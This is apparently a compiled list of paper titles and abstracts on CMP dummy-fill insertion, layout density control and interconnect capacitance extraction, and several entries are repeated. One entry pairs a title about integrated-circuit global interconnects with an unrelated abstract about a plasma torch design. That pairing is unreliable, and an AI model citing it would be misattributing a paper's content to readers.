--- paper_title: An exhaustive method for characterizing the interconnect capacitance considering the floating dummy-fills by employing an efficient field solving algorithm paper_content: This paper presents an exhaustive method to characterize the interconnect capacitances while taking the floating dummy-fills into account. Results of the case study with typical floating dummy-fills show that the inter-layer capacitances are also an important factor in the electrical consideration for the dummy-fills. An efficient field solving algorithm is implemented into the 3D finite-difference solver and its computational efficiency is compared with the industry-standard RAPHAEL. Furthermore, the overall flow for extracting the parasitic capacitance considering the dummy-fills at the full-chip level is discussed and the underlying assumption is examined. --- paper_title: Filling algorithms and analyses for layout density control paper_content: In very deep-submicron very large scale integration (VLSI), manufacturing steps involving chemical-mechanical polishing (CMP) have varying effects on device and interconnect features, depending on local characteristics of the layout. To reduce manufacturing variation due to CMP and to improve performance predictability and yield, the layout must be made uniform with respect to certain density criteria, by inserting "fill" geometries into the layout. To date, only foundries and special mask data processing tools perform layout post-processing for density control. In the future, better convergence of performance verification flows will depend on such layout manipulations being embedded within the layout synthesis (place-and-route) flow. In this paper, we give the first realistic formulation of the filling problem that arises in layout optimization for manufacturability. Our formulation seeks to add features to a given process layer, such that (1) feature area densities satisfy prescribed upper and lower bounds in all windows of given size and (2) the maximum variation of such densities over all possible window positions in the layout is minimized. We present efficient algorithms for density analysis, notably a multilevel approach that affords user-tunable accuracy. We also develop exact solutions to the problem of fill synthesis, based on a linear programming approach. These include a linear programming (LP) formulation for the fixed-dissection regime (where density bounds are imposed on a predetermined set of windows in the layout) and an LP formulation that is automatically generated by our multilevel density analysis. We briefly review criteria for fill pattern synthesis, and the paper then concludes with computational results and directions for future research. --- paper_title: Optimized pattern fill process for improved CMP uniformity and interconnect capacitance paper_content: In multilevel IC manufacturing, it's important to have a planar surface preceding the next layer to avoid topographical margin issues. To achieve the local, as well as global, planarity of the wafer surface many innovative technologies have been developed. The development of Chemical-Mechanical Polishing (CMP) has led to dramatic improvement in planarity of dielectrics and later in the development of planar plug-fill and dual damascene copper metallization. It is well known that CMP causes dishing of a layer to be planarized due to uneven distribution of device structures and thus reducing the effectiveness of this technology. 
One of the solutions for this dishing phenomenon has been the introduction of a pattern fill methodology to improve the planarity of a given layer. However, dummy pattern adds capacitive load and thus parasitic effects on both analog and digital circuits. In this paper a unique fill methodology is presented that reduces the impact on parasitic capacitance while improving the dielectric planarity through the use of irregularly shaped fill features and restrictions to placement of these features. --- paper_title: Simple and Accurate Models for Capacitance Increment due to Metal Fill Insertion paper_content: Inserting metal fill to improve inter-level dielectric thickness planarity is an essential part of the modern design process. However, the inserted fill shapes impact the performance of signal interconnect by increasing capacitance. In this paper, we analyze and model the impact of the metal dummy on the signal capacitance with various parameters including their electrical characteristic, signal dimensions, and dummy shape and dimensions. Fill has differing impact on interconnects depending on whether the signal of interest is in the same layer as the fill or not. In particular, intra-layer dummy has its greatest impact on coupling capacitance while inter-layer dummy has more impact on the ground capacitance component. Based on an analysis of fill impact on capacitance, we propose simple capacitance increment models (Cc for intra-layer dummy and Cg for inter-layer dummy). To consider the realistic case with both signals and metal fill in adjacent layers, we apply a weighting function approach in the ground capacitance model. We verify this model using simple test patterns and benchmark circuits and find that the models match well with field solver results (1.2% average error with much faster runtime than commercial extraction tools, the runtime overhead reduced by ~75% for all benchmark circuits). --- paper_title: Efficient 3-D extraction of interconnect capacitance considering floating metal fills with boundary element method paper_content: Inserting dummy (area fill) metals is necessary to reduce the pattern-dependent variation of dielectric thickness in the chemical-mechanical polishing (CMP) process. Such floating dummy metals affect interconnect capacitance and, therefore, signal delay and crosstalk significantly. To take the floating dummies into account, an efficient method for three-dimensional (3-D) capacitance extraction based on the boundary element method is proposed. By introducing a floating condition into the direct boundary integral equation (BIE) and adopting an efficient preconditioning technique, and the quasi-multiple medium (QMM) acceleration, the method achieves very high computational speed. For some typical structures of area fill, the presented algorithm has shown over 1000× speedup over the industry-standard Raphael while preserving high accuracy. Compared with the recently proposed PASCAL in the work of Park et al. (2000), the proposed method also has about ten times speedup. Since the dummies are not regarded as normal electrodes in capacitance extraction, the proposed method is much more efficient than the conventional method, especially in cases with a large number of floating dummies. --- paper_title: A DOE Set for Normalization-Based Extraction of Fill Impact on Capacitances paper_content: Metal fills, which are used to reduce metal thickness variations due to chemical-mechanical polishing (CMP), increase the capacitances in a circuit.
Although current extraction tools are accurate in handling grounded fills and regular interconnects, for floating fills, these tools are based on certain approximations, such as assuming that floating fills are grounded or that each fill is merged with neighboring ones. To reduce such inaccuracies, the authors provide a design of experiments (DOE), which will be used in addition to what is available in the extraction tools for regular interconnects. Through the proposed DOE set, a design or mask house can generate normalized fill tables to remove the inaccuracies of the extraction tools in the presence of floating fills. The capacitance values are updated using these normalized fill tables. The proposed DOE enables extensive analyses of the fill impacts on coupling capacitances. The authors show through extensive 3D field solver simulations that the assumptions used in extractors result in significant inaccuracies. The authors present analyses of fill impacts for an example technology, and also provide analyses using the normalized fill tables to be used in the extraction flow for three different standard fill algorithms. --- paper_title: Efficient capacitance extraction method for interconnects with dummy fills paper_content: The accuracy of parasitic extraction has become increasingly important for system-on-chip (SoC) designs. In this paper, we present a practical method of dealing with the influences of floating dummy metal fills, which are inserted to assist planarization by the chemical-mechanical polishing (CMP) process, in extracting interconnect capacitances. The method is based on reducing the thicknesses of dummy metal layers according to electrical field theory. We also clarify the influences of dummy metal fills on the parasitic capacitance, signal delay, and crosstalk noise. Moreover, we address that the existence of the interlayer dummy metal fills has more significant influences than the intralayer dummies in terms of the impact on coupling capacitances. When dummy metal fills are ignored, the error of capacitance extraction can be more than 30%, whereas the error of the proposed method is less than about 10% for many practical geometries. We also demonstrate, by comparison with capacitance results measured for a 90-nm test chip, that the error of the proposed method is less than 8%. --- paper_title: Variability-driven considerations in the design of integrated-circuit global interconnects paper_content: A torch with a turbulized supply of a plasma forming gas comprises an electrode having a high-melting insert and a flat end face, and a nozzle with an internal surface having two mated portions: one cylindrical and one tapering; and the diameter of the electrode flat end face amounts essentially to 0.4-0.5 diameter of the electrode proper and the radius of conjugation of the nozzle cylindrical and tapering portions is equal essentially to the length of its cylindrical portion. Due to such a design, the inventive torch features a long service life of both the electrode and the nozzle. --- paper_title: Simultaneous buffer insertion and wire sizing considering systematic CMP variation and random Leff variation paper_content: This paper presents extensions of the dynamic-programming (DP) framework to consider buffer insertion and wire sizing under effects of process variation. We study the effectiveness of this approach to reduce timing impact caused by chemical-mechanical planarization (CMP)-induced systematic variation and random Leff process variation in devices.
We first present a quantitative study on the impact of CMP on interconnect parasitics. We then introduce a simple extension to handle CMP effects in the buffer insertion and wire sizing problem by simultaneously considering fill insertion (SBWF). We also tackle the same problem but with random Leff process variation (vSBWF) by incorporating statistical timing into the DP framework. We develop an efficient yet accurate heuristic pruning rule to approximate the computationally expensive statistical problem. Experiments under conservative assumptions on process variation show that the SBWF algorithm obtains 1.6% timing improvement over the variation-unaware solution. Moreover, our statistical vSBWF algorithm results in 43.1% yield improvement on average. We also show that our approaches have polynomial time complexity with respect to the net size. The proposed extensions of the DP framework are orthogonal to other power/area-constrained problems under the same framework, which have been extensively studied in the literature. --- paper_title: The Emerging JBIG2 Standard paper_content: The Joint Bi-Level Image Experts Group (JBIG), an international study group affiliated with ISO/IEC and ITU-T, is in the process of drafting a new standard for lossy and lossless compression of bilevel images. The new standard, informally referred to as JBIG2, will support model-based coding for text and halftones to permit compression ratios up to three times those of existing standards for lossless compression. JBIG2 will also permit lossy preprocessing without specifying how it is to be done. In this case, compression ratios up to eight times those of existing standards may be obtained with imperceptible loss of quality. It is expected that JBIG2 will become an international standard by 2000. --- paper_title: Compressible area fill synthesis paper_content: Control of variability and performance in the back end of the VLSI manufacturing line has become extremely difficult with the introduction of new materials such as copper and low-k dielectrics. To improve manufacturability, and in particular to enable more uniform chemical-mechanical planarization (CMP), it is necessary to insert area fill features into low-density layout regions. Because area fill feature sizes are very small compared to the large empty layout areas that need to be filled, the filling process can increase the size of the resulting layout data file by an order of magnitude or more. To reduce file transfer times, and to accommodate future maskless lithography regimes, data compression becomes a significant requirement for fill synthesis. In this paper, we make the following contributions. First, we define two complementary strategies for fill data volume reduction corresponding to two different points in the design-to-manufacturing flow: compressible filling and post-fill compression. Second, we compare compressible filling methods in the fixed-dissection regime when two different sets of compression operators are used: the traditional GDSII array reference (AREF) construct, and the new Open Artwork System Interchange Standard (OASIS) repetitions. We apply greedy techniques to find practical compressible filling solutions and compare them with optimal integer linear programming solutions. Third, for the post-fill data compression problem, we propose two greedy heuristics, an exhaustive search-based method, and a smart spatial regularity search technique.
We utilize an optimal bipartite matching algorithm to apply OASIS repetition operators to irregular fill patterns. Our experimental results indicate that both fill data compression methodologies can achieve significant data compression ratios, and that they outperform industry tools such as Calibre V8.8 from Mentor Graphics. Our experiments also highlight the advantages of the new OASIS compression operators over the GDSII AREF construct. --- paper_title: Filling and slotting: analysis and algorithms paper_content: In very deep-submicron VLSI, certain manufacturing steps - notably optical exposure, resist development and etch, chemical vapor deposition and chemical-mechanical polishing (CMP) - have varying effects on device and interconnect features depending on local characteristics of the layout. To make these effects uniform and predictable, the layout itself must be made uniform with respect to certain density parameters. Traditionally, only foundries have performed the post-processing needed to achieve this uniformity, via insertion (“filling”) or partial deletion (“slotting”) of features in the layout. Today, however, physical design and verification tools cannot remain oblivious to such foundry post-processing. Without an accurate estimate of the filling and slotting, RC extraction, delay calculation, and timing and noise analysis flows will all suffer from wild inaccuracies. Therefore, future place-and-route tools must efficiently perform filling and slotting prior to performance analysis within the layout optimization loop. We give the first formulations of the filling and slotting problems that arise in layout post-processing or layout optimization for manufacturability. Such formulations seek to add or remove features to a given process layer, so that the local area or perimeter density of features satisfies prescribed upper and lower bounds in all windows of a given size. We also present efficient algorithms for density analysis as well as for filling/slotting synthesis. Our work provides a new unification between manufacturing and physical design, and captures a number of general requirements imposed on layout by the manufacturing process. --- paper_title: Filling algorithms and analyses for layout density control paper_content: In very deep-submicron very large scale integration (VLSI), manufacturing steps involving chemical-mechanical polishing (CMP) have varying effects on device and interconnect features, depending on local characteristics of the layout. To reduce manufacturing variation due to CMP and to improve performance predictability and yield, the layout must be made uniform with respect to certain density criteria, by inserting "fill" geometries into the layout. To date, only foundries and special mask data processing tools perform layout post-processing for density control. In the future, better convergence of performance verification flows will depend on such layout manipulations being embedded within the layout synthesis (place-and-route) flow. In this paper, we give the first realistic formulation of the filling problem that arises in layout optimization for manufacturability. Our formulation seeks to add features to a given process layer, such that (1) feature area densities satisfy prescribed upper and lower bounds in all windows of given size and (2) the maximum variation of such densities over all possible window positions in the layout is minimized.
We present efficient algorithms for density analysis, notably a multilevel approach that affords user-tunable accuracy. We also develop exact solutions to the problem of fill synthesis, based on a linear programming approach. These include a linear programming (LP) formulation for the fixed-dissection regime (where density bounds are imposed on a predetermined set of windows in the layout) and an LP formulation that is automatically generated by our multilevel density analysis. We briefly review criteria for fill pattern synthesis, and the paper then concludes with computational results and directions for future research. --- paper_title: Is your layout density verification exact?: a fast exact algorithm for density calculation paper_content: As device shapes keep shrinking, designs are more sensitive to manufacturing processes. In order to improve performance predictability and yield, mask layout uniformity/evenness is highly desired, and it is usually measured by the feature density, with a feasible range defined in the manufacturing process design rules. To address the density control problem, one fundamental problem is how to calculate density accurately and efficiently. In this paper, we propose a fast exact algorithm to identify the maximum density for a given layout. Compared with the existing exact algorithms, our algorithm reduces the running time from days/hours to a few minutes/seconds. It is even faster than the existing approximate algorithms in the literature. --- paper_title: Filling and slotting: analysis and algorithms paper_content: In very deep-submicron VLSI, certain manufacturing steps - notably optical exposure, resist development and etch, chemical vapor deposition and chemical-mechanical polishing (CMP) - have varying effects on device and interconnect features depending on local characteristics of the layout. To make these effects uniform and predictable, the layout itself must be made uniform with respect to certain density parameters. Traditionally, only foundries have performed the post-processing needed to achieve this uniformity, via insertion (“filling”) or partial deletion (“slotting”) of features in the layout. Today, however, physical design and verification tools cannot remain oblivious to such foundry post-processing. Without an accurate estimate of the filling and slotting, RC extraction, delay calculation, and timing and noise analysis flows will all suffer from wild inaccuracies. Therefore, future place-and-route tools must efficiently perform filling and slotting prior to performance analysis within the layout optimization loop. We give the first formulations of the filling and slotting problems that arise in layout post-processing or layout optimization for manufacturability. Such formulations seek to add or remove features to a given process layer, so that the local area or perimeter density of features satisfies prescribed upper and lower bounds in all windows of a given size. We also present efficient algorithms for density analysis as well as for filling/slotting synthesis. Our work provides a new unification between manufacturing and physical design, and captures a number of general requirements imposed on layout by the manufacturing process. --- paper_title: Comments on "Filling algorithms and analyses for layout density control" paper_content: Theorem 2 of the title paper (A.B. Kahng et al., ibid. vol.
18, pp. 445-462, 1999) presents layout density bounds for any fixed r-dissection w-by-w window given the layout density of at least L and at most U for all w-by-w windows whose bottom-left corners are at points (i(w/r), j(w/r)), i, j = 0, 1, ..., r((n/w)-1) on an n-by-n layout plane. However, the bounds are not tight for certain combinations of U (L) and r. Here, the authors present an approach to obtaining the tight lower and upper bounds for all possible combinations of U (L) and r. --- paper_title: New and exact filling algorithms for layout density control paper_content: To reduce manufacturing variation due to chemical-mechanical polishing and to improve yield, layout must be made uniform with respect to density criteria. This is achieved by layout postprocessing to add fill geometries, either at the foundry or, for better convergence of performance verification flows, during layout synthesis. This paper proposes a new min-variation objective for the synthesis of fill geometries. Within the so-called fixed-dissection regime (where density bounds are imposed on a predetermined set of windows in the layout), we exactly solve the min-variation objective using a linear programming formulation. We also state criteria for fill pattern synthesis, and discuss additional criteria that apply when fill must be grounded for predictability of circuit performance. We believe that density control for CMP will become an important research topic in the VLSI design-manufacturing interface over the next several years. --- paper_title: Filling and slotting: analysis and algorithms paper_content: In very deep-submicron VLSI, certain manufacturing steps - notably optical exposure, resist development and etch, chemical vapor deposition and chemical-mechanical polishing (CMP) - have varying effects on device and interconnect features depending on local characteristics of the layout. To make these effects uniform and predictable, the layout itself must be made uniform with respect to certain density parameters. Traditionally, only foundries have performed the post-processing needed to achieve this uniformity, via insertion (“filling”) or partial deletion (“slotting”) of features in the layout. Today, however, physical design and verification tools cannot remain oblivious to such foundry post-processing. Without an accurate estimate of the filling and slotting, RC extraction, delay calculation, and timing and noise analysis flows will all suffer from wild inaccuracies. Therefore, future place-and-route tools must efficiently perform filling and slotting prior to performance analysis within the layout optimization loop. We give the first formulations of the filling and slotting problems that arise in layout post-processing or layout optimization for manufacturability. Such formulations seek to add or remove features to a given process layer, so that the local area or perimeter density of features satisfies prescribed upper and lower bounds in all windows of a given size. We also present efficient algorithms for density analysis as well as for filling/slotting synthesis. Our work provides a new unification between manufacturing and physical design, and captures a number of general requirements imposed on layout by the manufacturing process.
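Several of the entries above revolve around the same fixed-dissection linear program for min-variation fill. As a rough sketch (our notation, chosen for illustration; the exact variables and constraints in the cited papers may differ), let d_ij be the existing feature area in tile (i, j) of the r-dissection, s_ij the empty area available for fill in that tile, and f_ij the fill area to be inserted; then

\begin{align*}
\min\ & D_{\max} - D_{\min} \\
\text{s.t.}\ & 0 \le f_{ij} \le s_{ij} \quad \text{for every tile } (i,j), \\
& D_W = \frac{1}{w^2} \sum_{(i,j) \in W} \left( d_{ij} + f_{ij} \right) \quad \text{for every } w \times w \text{ window } W \text{ of the dissection}, \\
& L \le D_W \le U, \qquad D_{\min} \le D_W \le D_{\max}.
\end{align*}

Minimizing D_max - D_min is the min-variation objective; dropping it and keeping only the L <= D_W <= U rows recovers the plain upper/lower-bound filling problem described in the other entries.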
--- paper_title: New multilevel and hierarchical algorithms for layout density control paper_content: Certain manufacturing steps in very deep submicron VLSI involve chemical-mechanical polishing (CMP), which has varying effects on device and interconnect features, depending on local layout characteristics. To reduce manufacturing variation due to CMP and to improve yield and performance predictability, the layout needs to be made uniform with respect to certain density criteria, by inserting "fill" geometries into the layout. This paper presents an efficient multilevel approach to density analysis that affords user-tunable accuracy. We also develop exact fill synthesis solutions based on combining multilevel analysis with a linear programming approach. Our methods apply to both flat and hierarchical designs. --- paper_title: Nanotopography Issues in Shallow Trench Isolation CMP paper_content: As advancing technologies increase the demand for planarity in integrated circuits, nanotopography has emerged as an important concern in shallow trench isolation (STI) on wafers polished by means of chemical-mechanical planarization (CMP). Previous work has shown that nanotopography - small surface-height variations of 10-100 nm in amplitude extending across millimeter-scale lateral distances on virgin wafers - can result in CMP-induced localized thinning of surface films such as the oxides or nitrides used in STI. A contact-wear CMP model can be employed to produce maps of regions on a given starting wafer that are prone to particular STI failures, such as the lack of complete clearing of the oxide in low spots and excessive erosion of nitride layers in high spots on the wafer. Stiffer CMP pads result in increased nitride thinning. A chip-scale pattern-dependent CMP simulation shows that substantial additional dishing and erosion occur because of the overpolishing time required due to nanotopography. Projections indicate that nanotopography height specifications will likely need to decrease in order to scale with smaller feature sizes in future IC technologies. --- paper_title: New and exact filling algorithms for layout density control paper_content: To reduce manufacturing variation due to chemical-mechanical polishing and to improve yield, layout must be made uniform with respect to density criteria. This is achieved by layout postprocessing to add fill geometries, either at the foundry or, for better convergence of performance verification flows, during layout synthesis. This paper proposes a new min-variation objective for the synthesis of fill geometries. Within the so-called fixed-dissection regime (where density bounds are imposed on a predetermined set of windows in the layout), we exactly solve the min-variation objective using a linear programming formulation. We also state criteria for fill pattern synthesis, and discuss additional criteria that apply when fill must be grounded for predictability of circuit performance. We believe that density control for CMP will become an important research topic in the VLSI design-manufacturing interface over the next several years. --- paper_title: Computational Geometry: An Introduction paper_content: From the reviews: "This book offers a coherent treatment, at the graduate textbook level, of the field that has come to be known in the last decade or so as computational geometry...The book is well organized and lucidly written; a timely contribution by two founders of the field.
It clearly demonstrates that computational geometry in the plane is now a fairly well-understood branch of computer science and mathematics. It also points the way to the solution of the more challenging problems in dimensions higher than two." --- paper_title: Dummy Feature Placement for Oxide Chemical-Mechanical Polishing Manufacturability paper_content: Chemical-mechanical polishing (CMP) is a technique used in very deep-submicron VLSI manufacturing to achieve uniformity in long-range oxide planarization. Post-CMP topography is highly related to local spatial pattern density in the layout. To change local pattern density, and thus ensure post-CMP planarization, dummy features are placed in the layout. The only known previously published algorithm for dummy feature placement is based on a very simple and inadequate model. This paper is based on a closed-form analytical model for inter-level dielectric thickness in the CMP process by B. Stine et al. and a model for effective local layout pattern density by D. Ouma et al. Those two models accurately describe the relation between local pattern density and post-CMP planarization. This paper uses those two models to solve the dummy feature placement problem of a single layer in the fixed-dissection regime. An experiment, conducted with real industry design data, gives excellent results by reducing post-CMP topography variation from 753 Å to 169 Å. --- paper_title: Filling algorithms and analyses for layout density control paper_content: In very deep-submicron very large scale integration (VLSI), manufacturing steps involving chemical-mechanical polishing (CMP) have varying effects on device and interconnect features, depending on local characteristics of the layout. To reduce manufacturing variation due to CMP and to improve performance predictability and yield, the layout must be made uniform with respect to certain density criteria, by inserting "fill" geometries into the layout. To date, only foundries and special mask data processing tools perform layout post-processing for density control. In the future, better convergence of performance verification flows will depend on such layout manipulations being embedded within the layout synthesis (place-and-route) flow. In this paper, we give the first realistic formulation of the filling problem that arises in layout optimization for manufacturability. Our formulation seeks to add features to a given process layer, such that (1) feature area densities satisfy prescribed upper and lower bounds in all windows of given size and (2) the maximum variation of such densities over all possible window positions in the layout is minimized. We present efficient algorithms for density analysis, notably a multilevel approach that affords user-tunable accuracy. We also develop exact solutions to the problem of fill synthesis, based on a linear programming approach. These include a linear programming (LP) formulation for the fixed-dissection regime (where density bounds are imposed on a predetermined set of windows in the layout) and an LP formulation that is automatically generated by our multilevel density analysis. We briefly review criteria for fill pattern synthesis, and the paper then concludes with computational results and directions for future research.
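The density-analysis step that the filling formulations above rely on - evaluating the feature density of every window of the fixed dissection - reduces to a sliding-window sum over a tile grid. The sketch below is ours and is deliberately simpler than the multilevel analysis described in the cited papers; the array names and the prefix-sum approach are illustrative assumptions.

import numpy as np

def window_densities(tile_density, r):
    """Average density of every r-by-r block of tiles (i.e. every w-by-w
    window of the fixed dissection), computed with 2-D prefix sums.

    tile_density : (n, n) array, fraction of each (w/r)-sized tile covered
                   by features (existing layout plus any inserted fill)
    r            : number of tiles per window side
    Returns an (n-r+1, n-r+1) array of window densities.
    """
    n = tile_density.shape[0]
    P = np.zeros((n + 1, n + 1))
    P[1:, 1:] = np.cumsum(np.cumsum(tile_density, axis=0), axis=1)
    # Each window sum is an O(1) combination of four prefix-sum entries.
    sums = P[r:, r:] - P[:-r, r:] - P[r:, :-r] + P[:-r, :-r]
    return sums / (r * r)

# Hypothetical usage: the extremal windows are what a fill LP or a
# Monte-Carlo insertion loop would try to pull toward each other.
grid = np.random.rand(64, 64) * 0.6
D = window_densities(grid, r=4)
print(D.min(), D.max())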
--- paper_title: Monte-Carlo algorithms for layout density control paper_content: Chemical-mechanical polishing (CMP) and other manufacturing steps in very deep submicron VLSI have varying effects on device and interconnect features, depending on local characteristics of the layout. To enhance manufacturability and performance predictability, we seek to make the layout uniform with respect to prescribed density criteria, by inserting "fill" geometries into the layout. We propose several new Monte-Carlo based filling methods with fast dynamic data structures and report the tradeoff between runtime and accuracy for the suggested methods. Compared to existing linear programming based approaches, our Monte-Carlo methods seem very promising as they produce nearly-optimal solutions within reasonable runtimes. --- paper_title: Practical iterated fill synthesis for CMP uniformity paper_content: We propose practical iterated methods for layout density control for CMP uniformity, based on linear programming, Monte-Carlo and greedy algorithms. We experimentally study the tradeoffs between two main filling objectives: minimizing density variation, and minimizing the total amount of inserted fill. Comparisons with previous filling methods show the advantages of our new iterated Monte-Carlo and iterated greedy methods. We achieve near-optimal filling with respect to each of the objectives and for both density models ( spatial density [3] and effective density [8]). Our new methods are more efficient in practice than linear programming [3] and more accurate than non-iterated Monte-Carlo approaches [1]. --- paper_title: Hierarchical dummy fill for process uniformity paper_content: To improve manufacturability and performance predictability, we seek to make a layout uniform with respect to prescribed density criteria, by inserting "fill" geometries into the layout. Previous approaches for flat layout density control are not scalable due to the necessity of solving very large linear programs, the large data volume of the solution, and the impact of hierarchy-breaking on verification. In this paper, we give the first methods for hierarchical layout density control for process uniformity. Our approach trades off naturally between runtime, solution quality, and output data volume. We also allow generation of compressed GDSII of fill geometries. Our experiments show that this hybrid hierarchical filling approach saves data volume and is scalable, while yielding solution quality that is competitive with existing Monte-Carlo and linear programming based approaches. --- paper_title: Performance-impact limited area fill synthesis paper_content: Chemical-mechanical planarization (CMP) and other manufacturing steps in every deep-submicron VLSI have varying effects on device and interconnect features, depending on the local density. To improve manufacturability and performance predictability, area fill features are inserted into the layout to improve uniformity with respect to density criteria. However, the performance impact of area fill insertion is not considered by any fill method in the literature. In this paper, we first review and develop estimates for capacitance and timing overhead of area fill insertions. We then give the first formulations of the Performance Impact Limited Fill (PIL-Fill) problem with the objective of either minimizing total delay impact (MDFC) or maximizing the minimum slack of all nets (MSFC), subject to inserting a given prescribed amount of fill. 
For the MDFC PIL-Fill problem, we describe three practical solution approaches based on Integer Linear Programming (ILP-I and ILP-II) and the Greedy method. For the MSFC PIL-Fill problem, we describe an iterated greedy method that integrates calls to an industry static timing analysis tool. We test our methods on layout testcases obtained from industry. Compared with the normal fill method according to Y. Chen et al. (2002), our ILP-II method for the MDFC PIL-Fill problem achieves between 25% and 90% reduction in terms of total weighted edge delay (roughly, a measure of the sum of node slacks) impact while maintaining ideal quality of the layout density control, and our iterated greedy method for the MSFC PIL-Fill problem also shows a significant advantage with respect to the minimum slack of nets on the post-fill layout. --- paper_title: Dummy fill density analysis with coupling constraints paper_content: In modern VLSI manufacturing processes, dummy fills are widely used to adjust local metal density in order to improve layout uniformity and yield optimization. However, the introduction of a large amount of dummy features also affects wire electrical properties. In this paper, we propose the first Coupling constrained Dummy Fill (CDF) analysis algorithm, which identifies feasible locations for dummy fills such that the fill-induced coupling capacitance can be bounded within the given coupling threshold of each wire segment. The algorithm also makes efforts to maximize ground dummy fills, which are more robust and predictable. The output of the algorithm can be treated as the upper bound for dummy fill insertion, and it can be easily adopted in density models to guide dummy fill insertion without disturbing the existing design. --- paper_title: Energy-Minimization Model for Fill Synthesis paper_content: Although fill allocation methods to enable reduced metal height variations and manually applicable design guidelines to reduce coupling capacitances are available, the synthesis of fills according to these allocations or guidelines is not well automated. Current fill insertion algorithms mostly use simple mask operations, which fail to enable the implementation of complex design guidelines. The proposed fill synthesis model not only enables implementation of such guidelines, but is also suitable for insertion of standard fill patterns. The proposed novel model has an intricate analogy to the electrons filling the orbits of an atom. Through the proposed method, the task of designing an optimal fill configuration is carried to the CAD tool designer in terms of designing a suitable energy network or rules, albeit in an easier way through provided insights and models. --- paper_title: SPIDER: simultaneous post-layout IR-drop and metal density enhancement with redundant fill paper_content: This paper presents SPIDER, a novel methodology that advantageously utilizes metal fill to simultaneously fulfil metal density requirements and reduce IR-drop of the power distribution network. This is achieved through the addition of partially redundant connections between metal fills and power meshes.
Our technique is especially significant for 90 nm process technology or below because (1) metal fill must now be done as part of the IC implementation flow due to its increasing impact on timing, (2) the tolerance for IR-drop is tightening due to voltage scaling, and the increasingly conservative power mesh design to address IR-drop is adding a significant burden on the available routing resources, (3) IR-drop is getting worse due to increasing design sizes, and (4) the large degree of design uncertainty demands IR-drop repair capabilities that can be applied after routing is completed. SPIDER addresses all these issues practically with little or no cost. Experimental results further demonstrate the robustness and effectiveness of our approach: SPIDER achieves an average IR-drop reduction of 62.2% in 16 designs of various sizes. --- paper_title: Fill for shallow trench isolation CMP paper_content: Shallow trench isolation (STI) is the mainstream CMOS isolation technology. It uses chemical mechanical polishing (CMP) to remove the excess deposited oxide and attain a planar surface for successive process steps. Despite advances in STI CMP technology, pattern dependencies cause large post-CMP topography variation that can result in functional and parametric yield loss. Fill insertion is used to reduce pattern variation and consequently decrease post-CMP topography variation. Traditional fill insertion is rule-based and is used with reverse etchback to attain the desired planarization quality. Due to extra costs associated with reverse etchback, "single-step" STI CMP in which fill insertion suffices is desirable. To alleviate the failures caused by imperfect CMP, we focus on two objectives for fill insertion: oxide density variation minimization and nitride density maximization. A linear programming based optimization is used to calculate oxide densities that minimize oxide density variation. Next, a fill insertion methodology is presented that attains the calculated oxide density while maximizing the nitride density. Averaged over the two large testcases, the oxide density variation is reduced by 63% and the minimum nitride density increased by 79% compared to tiling-based fill insertion. To assess post-CMP planarization, we run CMP simulation on the layout filled with our approach and find the planarization window (the time window in which polishing can be stopped) to increase by 17% and the maximum final step height (the maximum difference in post-CMP oxide thickness) to decrease by 9%. --- paper_title: Modeling of chemical mechanical polishing for shallow trench isolation paper_content: Chemical mechanical polishing (CMP) is a key process enabling shallow trench isolation (STI), which is used in current integrated circuit manufacturing processes to achieve device isolation. Excessive dishing and erosion in STI CMP processes, however, create device yield concerns. This thesis proposes characterization and modeling techniques to address a variety of concerns in STI CMP. Three major contributions of this work are: characterization and modeling of STI CMP processes, both conventional and nonconventional; layout optimization to reduce pattern-dependent dishing and erosion; and modeling of wafer nanotopography impact on STI CMP yield. An STI CMP characterization method is combined with a chip-scale pattern-dependent model to create a methodology that enables tuning of STI CMP process models and prediction of post-CMP dishing, erosion, and clearing times on arbitrary layouts.
Model extensions enable characterization of STI CMP processes that use nonconventional consumable sets, including fixed abrasive pads and high-selectivity silica-based and ceria-based slurries. Experimental data validates the accuracy of the model for both conventional and nonconventional processes. Layout optimization techniques are developed that reduce pattern-density dependent dishing and erosion. Layout design modification is achieved through the use of dummy STI active areas and selective reverse etchback structures. Smart algorithms allow for optimal density distributions across the layout. The effect of wafer nanotopography (height variations that exist on unpatterned silicon wafers) is explored, characterized, and modelled. A diagnostic tool for examining the impact of nanotopography on STI device yields is developed, based on contact wear modeling. An aggregate estimator for the combined effect of wafer-scale nanotopography and chip-scale pattern-dependent dishing and erosion is developed. The techniques developed in this thesis can be used both for process optimization and for diagnosis and correction of potential problems due to layout, wafer and CMP process interaction. The characterization and modeling methods create a comprehensive set of tools for process characterization and post-CMP erosion and dishing prediction in STI processes. --- paper_title: Fill for shallow trench isolation CMP paper_content: Shallow trench isolation (STI) is the mainstream CMOS isolation technology. It uses chemical mechanical polishing (CMP) to remove the excess deposited oxide and attain a planar surface for successive process steps. Despite advances in STI CMP technology, pattern dependencies cause large post-CMP topography variation that can result in functional and parametric yield loss. Fill insertion is used to reduce pattern variation and consequently decrease post-CMP topography variation. Traditional fill insertion is rule-based and is used with reverse etchback to attain the desired planarization quality. Due to extra costs associated with reverse etchback, "single-step" STI CMP in which fill insertion suffices is desirable. To alleviate the failures caused by imperfect CMP, we focus on two objectives for fill insertion: oxide density variation minimization and nitride density maximization. A linear programming based optimization is used to calculate oxide densities that minimize oxide density variation. Next, a fill insertion methodology is presented that attains the calculated oxide density while maximizing the nitride density. Averaged over the two large testcases, the oxide density variation is reduced by 63% and the minimum nitride density increased by 79% compared to tiling-based fill insertion. To assess post-CMP planarization, we run CMP simulation on the layout filled with our approach and find the planarization window (the time window in which polishing can be stopped) to increase by 17% and the maximum final step height (the maximum difference in post-CMP oxide thickness) to decrease by 9%. --- paper_title: Characterizing STI CMP Processes with an STI Test Mask Having Realistic Geometric Shapes paper_content: Chemical mechanical polishing (CMP) has become the enabling planarization method for shallow trench isolation (STI) of sub-0.25 µm technology.
